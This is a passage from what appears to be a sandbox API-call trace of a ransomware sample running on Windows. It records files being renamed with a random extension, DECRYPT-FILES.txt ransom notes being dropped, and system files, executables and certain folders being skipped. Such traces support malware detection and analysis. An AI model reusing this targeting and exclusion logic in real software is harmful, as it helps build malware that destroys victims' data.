lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.996] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.996] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.996] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.996] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.996] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat") returned 86 [0079.996] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat.yq1PP") returned 92 [0079.996] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\index.dat.yq1PP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\index.dat.yq1pp"), dwFlags=0x0) returned 1 [0079.997] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.997] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.998] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.998] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabda3140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabda3140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabda3140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0079.998] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0079.998] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.998] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0079.998] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0079.998] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0079.998] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0079.998] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 77 [0079.998] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0079.998] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0079.998] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\jkbimi8.tmp" [0079.998] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.999] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0079.999] CloseHandle (hObject=0x0) returned 0 [0079.999] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.999] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xabda3140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xabda3140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabda3140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0079.999] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0079.999] CloseHandle (hObject=0x458) returned 1 [0079.999] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x50fa8bb0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x50fa8bb0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0079.999] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0080.000] CloseHandle (hObject=0x450) returned 1 [0080.000] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8b131c10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b131c10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0080.000] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0080.000] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0080.000] lstrcatW (in: lpString1="Recent", lpString2="\\" | out: lpString1="Recent\\") returned="Recent\\" [0080.000] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Program Files") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch=":\\Windows") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Games\\") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Tor Browser\\") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\ProgramData\\") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\All Users") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\IETldCache\\") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\Local Settings\\") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="\\AppData\\Local") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="AhnLab") returned 0x0 [0080.000] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0080.000] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 71 [0080.000] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0080.000] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\jkbimi8.tmp") returned 83 [0080.000] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0080.001] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 71 [0080.001] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0080.001] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\DECRYPT-FILES.txt") returned 89 [0080.001] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0080.002] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0080.003] CloseHandle (hObject=0x454) returned 1 [0080.003] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned 71 [0080.003] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*" [0080.003] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabe15560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe15560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0080.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.003] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xabe15560, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xabe15560, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0080.004] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.004] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b10bab0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b10bab0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b10bab0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa37, dwReserved0=0x0, dwReserved1=0x0, cFileName="-keodEgSHy.lnk", cAlternateFileName="-KEODE~1.LNK")) returned 1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="autorun.inf") returned 1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="boot.ini") returned 1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="desktop.ini") returned 1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="ntuser.dat") returned -1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="iconcache.db") returned 1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="bootsect.bak") returned 1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="ntuser.dat.log") returned -1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="thumbs.db") returned -1 [0080.004] lstrcmpiW (lpString1="-keodEgSHy.lnk", lpString2="Bootfont.bin") returned 1 [0080.004] lstrlenW (lpString="-keodEgSHy.lnk") returned 14 [0080.004] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.004] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad53850, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ad53850, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ad53850, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf9c, dwReserved0=0x0, dwReserved1=0x0, cFileName="-Wm-t35s2VO0tWM.lnk", cAlternateFileName="-WM-T3~1.LNK")) returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="autorun.inf") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="boot.ini") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="desktop.ini") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="ntuser.dat") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="iconcache.db") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="bootsect.bak") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="ntuser.dat.log") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="thumbs.db") returned 1 [0080.004] lstrcmpiW (lpString1="-Wm-t35s2VO0tWM.lnk", lpString2="Bootfont.bin") returned 1 [0080.004] lstrlenW (lpString="-Wm-t35s2VO0tWM.lnk") returned 19 [0080.004] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.004] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a890c50, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a890c50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a890c50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="-_DUtxFwiSOA_.lnk", cAlternateFileName="-_DUTX~1.LNK")) returned 1 [0080.004] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.004] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="autorun.inf") returned -1 [0080.004] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="boot.ini") returned -1 [0080.004] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="desktop.ini") returned -1 [0080.005] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="ntuser.dat") returned -1 [0080.005] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="iconcache.db") returned -1 [0080.005] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="bootsect.bak") returned -1 [0080.005] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="ntuser.dat.log") returned -1 [0080.005] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="thumbs.db") returned -1 [0080.005] lstrcmpiW (lpString1="-_DUtxFwiSOA_.lnk", lpString2="Bootfont.bin") returned -1 [0080.005] lstrlenW (lpString="-_DUtxFwiSOA_.lnk") returned 17 [0080.005] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.005] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89ebf190, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89ebf190, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89ebf190, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x992, dwReserved0=0x0, dwReserved1=0x0, cFileName="0 cG.mkv.lnk", cAlternateFileName="0CGMKV~1.LNK")) returned 1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="autorun.inf") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="boot.ini") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="desktop.ini") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="ntuser.dat") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="iconcache.db") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="bootsect.bak") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="ntuser.dat.log") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="thumbs.db") returned -1 [0080.005] lstrcmpiW (lpString1="0 cG.mkv.lnk", lpString2="Bootfont.bin") returned -1 [0080.005] lstrlenW (lpString="0 cG.mkv.lnk") returned 12 [0080.005] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.005] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6edd30, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a6edd30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a6edd30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa84, dwReserved0=0x0, dwReserved1=0x0, cFileName="0Vab-9jdPOdBqrE6M.lnk", cAlternateFileName="0VAB-9~1.LNK")) returned 1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="autorun.inf") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="boot.ini") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="desktop.ini") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="ntuser.dat") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="iconcache.db") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="bootsect.bak") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="ntuser.dat.log") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="thumbs.db") returned -1 [0080.005] lstrcmpiW (lpString1="0Vab-9jdPOdBqrE6M.lnk", lpString2="Bootfont.bin") returned -1 [0080.005] lstrlenW (lpString="0Vab-9jdPOdBqrE6M.lnk") returned 21 [0080.005] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.005] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac95170, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac95170, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac95170, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="1ek gB-.lnk", cAlternateFileName="1EKGB-~1.LNK")) returned 1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="autorun.inf") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="boot.ini") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="desktop.ini") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="ntuser.dat") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="iconcache.db") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="bootsect.bak") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="ntuser.dat.log") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="thumbs.db") returned -1 [0080.006] lstrcmpiW (lpString1="1ek gB-.lnk", lpString2="Bootfont.bin") returned -1 [0080.006] lstrlenW (lpString="1ek gB-.lnk") returned 11 [0080.006] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.006] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aaa5f90, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aaa5f90, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aaa5f90, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfde, dwReserved0=0x0, dwReserved1=0x0, cFileName="1fBhJo H3cVvF6LlYw8C.lnk", cAlternateFileName="1FBHJO~1.LNK")) returned 1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="DECRYPT-FILES.txt") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="autorun.inf") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="boot.ini") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="desktop.ini") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="ntuser.dat") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="iconcache.db") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="bootsect.bak") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="ntuser.dat.log") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="thumbs.db") returned -1 [0080.006] lstrcmpiW (lpString1="1fBhJo H3cVvF6LlYw8C.lnk", lpString2="Bootfont.bin") returned -1 [0080.006] lstrlenW (lpString="1fBhJo 